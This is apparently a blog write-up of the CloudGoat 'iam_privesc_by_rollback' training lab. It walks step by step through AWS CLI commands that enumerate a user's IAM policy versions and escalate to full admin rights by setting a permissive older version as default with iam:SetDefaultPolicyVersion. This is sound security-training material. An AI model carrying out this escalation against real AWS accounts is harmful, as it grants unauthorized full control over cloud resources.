CloudGoat: iam_privesc_by_rollback

0xLeeBai

·

Follow

2 min read

·

May 7, 2024

--

Listen

Share

Note:

• We will be performing our attack via Kali Linux
• Ensure you have done the pre-requisites before you start the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create iam_privesc_by_rollback

1.2 read the start.txt

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd iam_privesc_by_rollback*

┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt

aws_account_id = xxx1
policy_arn = xxx2
raynor_access_key_id = xxx3
raynor_secret_key = xxx4
username = xxx5

2. Enumeration

2.1: create profile for the raynor user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile raynor

AWS Access Key ID: xxx3
AWS Secret Access Key: xxx4
Default region name:
Default output format:

2.2: whoami

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile raynor --region us-east-1

{
  "UserId": "...",
  "Account": "...",
  "Arn": "arn:aws:iam:1234:user/raynor-iam_privesc_by_rollback_cgida6jux7d1r7"
}

2.3: policies enumeration

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
  "AttachedPolicies": [
    {
      "PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7",
      "PolicyArn": "arn:aws:iam:xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7"
    }
  ]
}

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy --policy-arn arn:aws:iam:xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
    "Policy": {
        ...  ...  ...
        "DefaultVersionId": "v1",
        ...  ...  ...
    }
}

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-policy-versions --policy-arn arn:aws:iam:xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
    "versions": 
    {
      {"VersionId":"v5", "IsDefaultVersion":false},
      {"VersionId":"v4", "IsDefaultVersion":false},
      {"VersionId":"v3", "IsDefaultVersion":false},
      {"VersionId":"v2", "IsDefaultVersion":false},
      {"VersionId":"v1", "IsDefaultVersion":true}
    }
}

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy-version --policy-arn arn:aws:iam:xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor --version-id v1

{
  ...  ...  ...
  {
    "Action": [
      "iam:SetDefaultPolicyVersion",
      ...  ...  ...
    ],
    "Effect": "Allow",
    "Resource": "*",
    "Sid": "IAMPrivilegeEscalationByRollback"
  },
  "VersionId": "v1",
  "IsDefaultVersion": true,
  ...  ...  ...
}

• in v1 we have “iam:SetDefaultPolicyVersion”, we can potentially set our default policy version to another one

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy-version --policy-arn arn:aws:iam:xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor --version-id v2

{
  ...  ...  ...
  {
    "Action": "*",
    "Effect": "Allow",
    "Resource": "*",
  },
  "VersionId": "v2",
  "IsDefaultVersion": false,
  ...  ...  ...
}

• in v2 allows every action on every resource
• if we can use iam:SetDefaultPolicyVersion and change v2 as our current policy, we will have these permissions

3. Exploitation

3.1: privilege escalation via iam:SetDefaultPolicyVersion

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam set-default-policy-version --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --version-id v2 --profile raynor

{
    "Policy": {
        ...  ...  ...
        "DefaultVersionId": "v2",
        ...  ...  ...
    }
}

• the default version is now changed to v2

4. clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy iam_privesc_by_rollback --help

Destroy xxx [y/n]: y